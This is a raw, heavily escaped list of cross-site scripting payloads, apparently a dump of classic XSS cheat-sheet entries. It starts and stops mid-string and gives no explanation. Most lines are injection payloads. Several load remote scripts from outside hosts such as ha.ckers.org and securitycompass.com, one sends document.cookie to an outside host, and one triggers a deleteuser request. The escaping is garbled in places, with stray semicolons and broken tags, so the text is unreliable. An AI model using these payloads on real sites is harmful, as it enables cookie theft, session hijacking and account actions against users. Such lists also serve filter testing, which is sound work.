ID=I&gt;&lt;/XML&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;!--[if gte IE 4]&gt; \\r\\n&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;\\r\\n&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;\\r\\n&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;\\r\\n&lt;? echo(&apos;&lt;SCR)&apos;;\\r\\n&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;DIV STYLE=&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028&apos;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029&apos;\\\\0029&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-\\r\\n\\\\&quot;;alert(&apos;XSS&apos;);//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\"XSS\\\");&lt;/SCRIPT&gt;\\r\\n&lt;STYLE&gt;@im\\\\port&apos;\\\\ja\\\\vasc\\\\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;\\r\\n&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;\\r\\nperl -e &apos;print &quot;&lt;IMG SRC=java\\\\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out\\r\\nperl -e &apos;print &quot;&amp;&lt;SCR\\\\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\\\\0IPT&gt;&quot;;&apos; &gt; out\\r\\n&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(&quot;XSS&quot;)&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;\\r\\n&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;\\r\\n&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;\\r\\n&lt;SCRIPT&gt;a=/XSS/\\r\\n&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;\\r\\n<script>document.vulnerable=true;</script>\\r\\n<img SRC=\\\"jav ascript:document.vulnerable=true;\\\">\\r\\n<img SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img SRC=\\\" &#14; javascript:document.vulnerable=true;\\\">\\r\\n<body onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;>\\r\\n<<SCRIPT>document.vulnerable=true;//<</SCRIPT>\\r\\n<script <B>document.vulnerable=true;</script>\\r\\n<img SRC=\\\"javascript:document.vulnerable=true;\\\"\\r\\n<iframe src=\\\"javascript:document.vulnerable=true; <\\r\\n<script>a=/XSS/\\\\ndocument.vulnerable=true;</script>\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n</title><SCRIPT>document.vulnerable=true;</script>\\r\\n<input TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<body BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<body ONLOAD=document.vulnerable=true;>\\r\\n<img DYNSRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img LOWSRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<bgsound SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<br SIZE=\\\"&{document.vulnerable=true}\\\">\\r\\n<LAYER SRC=\\\"javascript:document.vulnerable=true;\\\"></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<style>li {list-style-image: url(\\\"javascript:document.vulnerable=true;\\\");</STYLE><UL><LI>XSS\\r\\n<img SRC=\\\'vbscript:document.vulnerable=true;\\\'>\\r\\n1script3document.vulnerable=true;1/script3\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:document.vulnerable=true;\\\">\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:document.vulnerable=true;\\\">\\r\\n<IFRAME SRC=\\\"javascript:document.vulnerable=true;\\\"></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:document.vulnerable=true;\\\"></frameset>\\r\\n<table BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<table><TD BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<div STYLE=\\\"background-image: url(javascript:document.vulnerable=true;)\\\">\\r\\n<div STYLE=\\\"background-image: url(&#1;javascript:document.vulnerable=true;)\\\">\\r\\n<div STYLE=\\\"width: expression(document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\">\\r\\n<XSS STYLE=\\\"xss:expression(document.vulnerable=true)\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'>\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"javascript:document.vulnerable=true\\\");}</STYLE><A CLASS=XSS></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"javascript:document.vulnerable=true\\\")}</style>\\r\\n<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->\\r\\n<base HREF=\\\"javascript:document.vulnerable=true;//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>\\r\\n<XML ID=I><X><C><![<IMG SRC=\\\"javas]]<![cript:document.vulnerable=true;\\\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG SRC=\\\"javas<!-- -->cript:document.vulnerable=true\\\"></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true</SCRIPT>\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\\r\\n<a href=\\\"javascript#document.vulnerable=true;\\\">\\r\\n<div onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img dynsrc=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<input type=\\\"image\\\" dynsrc=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<bgsound src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n&<script>document.vulnerable=true;</script>\\r\\n&{document.vulnerable=true;};\\r\\n<img src=&{document.vulnerable=true;};>\\r\\n<link rel=\\\"stylesheet\\\" href=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<iframe src=\\\"vbscript:document.vulnerable=true;\\\">\\r\\n<img src=\\\"mocha:document.vulnerable=true;\\\">\\r\\n<img src=\\\"livescript:document.vulnerable=true;\\\">\\r\\n<a href=\\\"about:<script>document.vulnerable=true;</script>\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:document.vulnerable=true;\\\">\\r\\n<body onload=\\\"document.vulnerable=true;\\\">\\r\\n<div style=\\\"background-image: url(javascript:document.vulnerable=true;);\\\">\\r\\n<div style=\\\"behaviour: url([link to code]);\\\">\\r\\n<div style=\\\"binding: url([link to code]);\\\">\\r\\n<div style=\\\"width: expression(document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<style><!--</style><script>document.vulnerable=true;//--></script>\\r\\n<<script>document.vulnerable=true;</script>\\r\\n<![<!--]]<script>document.vulnerable=true;//--></script>\\r\\n<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->\\r\\n<img src=\\\"blah\\\"onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"blah>\\\" onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<xml id=\\\"X\\\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{-moz-binding:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n<script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\"></script>\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>\\\'\\\"-->\\r\\n<script a=\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script =\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=\\\">\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script \\\"a=\\\'>\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=`>` SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=\\\">\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(&quot;XSS&quot;)&gt;\\r\\n&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n&lt;/br style=a:expression(alert())&gt;\\r\\n&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;\\r\\n&lt;br size=\\\\&quot;&amp;{alert(&#039;XSS&#039;)}\\\\&quot;&gt;\\r\\nperl -e &#039;print \\\\&quot;&lt;IMG SRC=java\\\\0script:alert(\\\\&quot;XSS\\\\&quot;)&gt;\\\\&quot;;&#039; &gt; out\\r\\nperl -e &#039;print \\\\&quot;&lt;SCR\\\\0IPT&gt;alert(\\\\&quot;XSS\\\\&quot;)&lt;/SCR\\\\0IPT&gt;\\\\&quot;;&#039; &gt; out\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\\\"http://www.procheckup.com/?sid=\\\"%2bdocument.cookie)>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS STYLE=xss:expression(alert(\\\'XSS\\\'))>\\r\\n\\\"><script>alert(\\\'XSS\\\')</script>\\r\\n</XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS STYLE=xss:expression(alert(\\\'XSS\\\'))>\\r\\n\\\';;alert(String.fromCharCode(88,83,83))//\\\\\\\';;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//\\\\\\\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;\\\";>;\\\';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\\r\\n\\\';\\\';;!--\\\";<;XSS>;=&;{()}\\r\\n<;SCRIPT>;alert(\\\';XSS\\\';)<;/SCRIPT>;\\r\\n<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;\\r\\n<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\\r\\n<;BASE HREF=\\\";javascript:alert(\\\';XSS\\\';);//\\\";>;\\r\\n<;BGSOUND SRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY BACKGROUND=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;BODY ONLOAD=alert(\\\';XSS\\\';)>;\\r\\n<;DIV STYLE=\\\";background-image: url(javascript:alert(\\\';XSS\\\';))\\\";>;\\r\\n<;DIV STYLE=\\\";background-image: url(&;#1;javascript:alert(\\\';XSS\\\';))\\\";>;\\r\\n<;DIV STYLE=\\\";width: expression(alert(\\\';XSS\\\';));\\\";>;\\r\\n<;FRAMESET>;<;FRAME SRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;<;/FRAMESET>;\\r\\n<;IFRAME SRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;<;/IFRAME>;\\r\\n<;INPUT TYPE=\\\";IMAGE\\\"; SRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=javascript:alert(\\\';XSS\\\';)>;\\r\\n<;IMG DYNSRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG LOWSRC=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\";>;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\\r\\nexp/*<;XSS STYLE=\\\';no\\\\xss:noxss(\\\";*//*\\\";);\\r\\n<;STYLE>;li {list-style-image: url(\\\";javascript:alert(&#39;XSS&#39;)\\\";);}<;/STYLE>;<;UL>;<;LI>;XSS\\r\\n<;IMG SRC=\\\';vbscript:msgbox(\\\";XSS\\\";)\\\';>;\\r\\n<;LAYER SRC=\\\";http://ha.ckers.org/scriptlet.html\\\";>;<;/LAYER>;\\r\\n<;IMG SRC=\\\";livescript:[code]\\\";>;\\r\\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\\r\\n<;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0;url=javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\";>;\\r\\n<;META HTTP-EQUIV=\\\";refresh\\\"; CONTENT=\\\";0; URL=http://;URL=javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";mocha:[code]\\\";>;\\r\\n<;OBJECT TYPE=\\\";text/x-scriptlet\\\"; DATA=\\\";http://ha.ckers.org/scriptlet.html\\\";>;<;/OBJECT>;\\r\\n<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(\\\';XSS\\\';)>;<;/OBJECT>;\\r\\n<;EMBED SRC=\\\";http://ha.ckers.org/xss.swf\\\"; AllowScriptAccess=\\\";always\\\";>;<;/EMBED>;\\r\\na=\\\";get\\\";;&;#10;b=\\\";URL(\\\";\\\";;&;#10;c=\\\";javascript:\\\";;&;#10;d=\\\";alert(\\\';XSS\\\';);\\\";)\\\";;&#10;eval(a+b+c+d);\\r\\n<;STYLE TYPE=\\\";text/javascript\\\";>;alert(\\\';XSS\\\';);<;/STYLE>;\\r\\n<;IMG STYLE=\\\";xss:expr/*XSS*/ession(alert(\\\';XSS\\\';))\\\";>;\\r\\n<;XSS STYLE=\\\";xss:expression(alert(\\\';XSS\\\';))\\\";>;\\r\\n<;STYLE>;.XSS{background-image:url(\\\";javascript:alert(\\\';XSS\\\';)\\\";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;\\r\\n<;STYLE type=\\\";text/css\\\";>;BODY{background:url(\\\";javascript:alert(\\\';XSS\\\';)\\\";)}<;/STYLE>;\\r\\n<;LINK REL=\\\";stylesheet\\\"; HREF=\\\";javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;LINK REL=\\\";stylesheet\\\"; HREF=\\\";http://ha.ckers.org/xss.css\\\";>;\\r\\n<;STYLE>;@import\\\';http://ha.ckers.org/xss.css\\\';;<;/STYLE>;\\r\\n<;META HTTP-EQUIV=\\\";Link\\\"; Content=\\\";<;http://ha.ckers.org/xss.css>;; REL=stylesheet\\\";>;\\r\\n<;STYLE>;BODY{-moz-binding:url(\\\";http://ha.ckers.org/xssmoz.xml#xss\\\";)}<;/STYLE>;\\r\\n<;TABLE BACKGROUND=\\\";javascript:alert(\\\';XSS\\\';)\\\";>;<;/TABLE>;\\r\\n<;TABLE>;<;TD BACKGROUND=\\\";javascript:alert(\\\';XSS\\\';)\\\";>;<;/TD>;<;/TABLE>;\\r\\n<;HTML xmlns:xss>;\\r\\n<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=\\\";javas]]>;<;![CDATA[cript:alert(\\\';XSS\\\';);\\\";>;]]>;\\r\\n<;XML ID=\\\";xss\\\";>;<;I>;<;B>;<;IMG SRC=\\\";javas<;!-- -->;cript:alert(\\\';XSS\\\';)\\\";>;<;/B>;<;/I>;<;/XML>;\\r\\n<;XML SRC=\\\";http://ha.ckers.org/xsstest.xml\\\"; ID=I>;<;/XML>;\\r\\n<;HTML>;<;BODY>;\\r\\n<;!--[if gte IE 4]>; \\r\\n<;META HTTP-EQUIV=\\\";Set-Cookie\\\"; Content=\\\";USERID=<;SCRIPT>;alert(\\\';XSS\\\';)<;/SCRIPT>;\\\";>;\\r\\n<;XSS STYLE=\\\";behavior: url(http://ha.ckers.org/xss.htc);\\\";>;\\r\\n<;SCRIPT SRC=\\\";http://ha.ckers.org/xss.jpg\\\";>;<;/SCRIPT>;\\r\\n<;!--#exec cmd=\\\";/bin/echo \\\';<;SCRIPT SRC\\\';\\\";-->;<;!--#exec cmd=\\\";/bin/echo \\\';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;\\\';\\\";-->;\\r\\n<;? echo(\\\';<;SCR)\\\';;\\r\\n<;BR SIZE=\\\";&;{alert(\\\';XSS\\\';)}\\\";>;\\r\\n<;IMG SRC=JaVaScRiPt:alert(\\\';XSS\\\';)>;\\r\\n<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;\\r\\n<;IMG SRC=`javascript:alert(\\\";RSnake says, \\\';XSS\\\';\\\";)`>;\\r\\n<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;\\r\\n<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;\\r\\n<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;\\r\\n<;DIV STYLE=\\\";background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\';\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.10530053\\\\0027\\\\0029\\\';\\\\0029\\\";>;\\r\\n<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;\\r\\n<;HEAD>;<;META HTTP-EQUIV=\\\";CONTENT-TYPE\\\"; CONTENT=\\\";text/html; charset=UTF-7\\\";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(\\\';XSS\\\';);+ADw-/SCRIPT+AD4-\\r\\n\\\\\\\";;alert(\\\';XSS\\\';);//\\r\\n<;/TITLE>;<;SCRIPT>;alert(\\\"XSS\\\");<;/SCRIPT>;\\r\\n<;STYLE>;@im\\\\port\\\';\\\\ja\\\\vasc\\\\ript:alert(\\\";XSS\\\";)\\\';;<;/STYLE>;\\r\\n<;IMG SRC=\\\";jav&#x09;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x09;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0A;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG SRC=\\\";jav&;#x0D;ascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;IMG&#x0D;SRC&#x0D;=&#x0D;\\\";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;\\\';&#x0D;X&#x0D;S&#x0D;S&#x0D;\\\';&#x0D;)&#x0D;\\\";&#x0D;>;&#x0D;\\r\\nperl -e \\\';print \\\";<;IM SRC=java\\\\0script:alert(\\\";XSS\\\";)>\\\";;\\\';>; out\\r\\nperl -e \\\';print \\\";&;<;SCR\\\\0IPT>;alert(\\\";XSS\\\";)<;/SCR\\\\0IPT>;\\\";;\\\'; >; out\\r\\n<;IMG SRC=\\\"; &;#14; javascript:alert(\\\';XSS\\\';);\\\";>;\\r\\n<;SCRIPT/XSS SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\n<;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n<;SCRIPT SRC=//ha.ckers.org/.j>;\\r\\n<;IMG 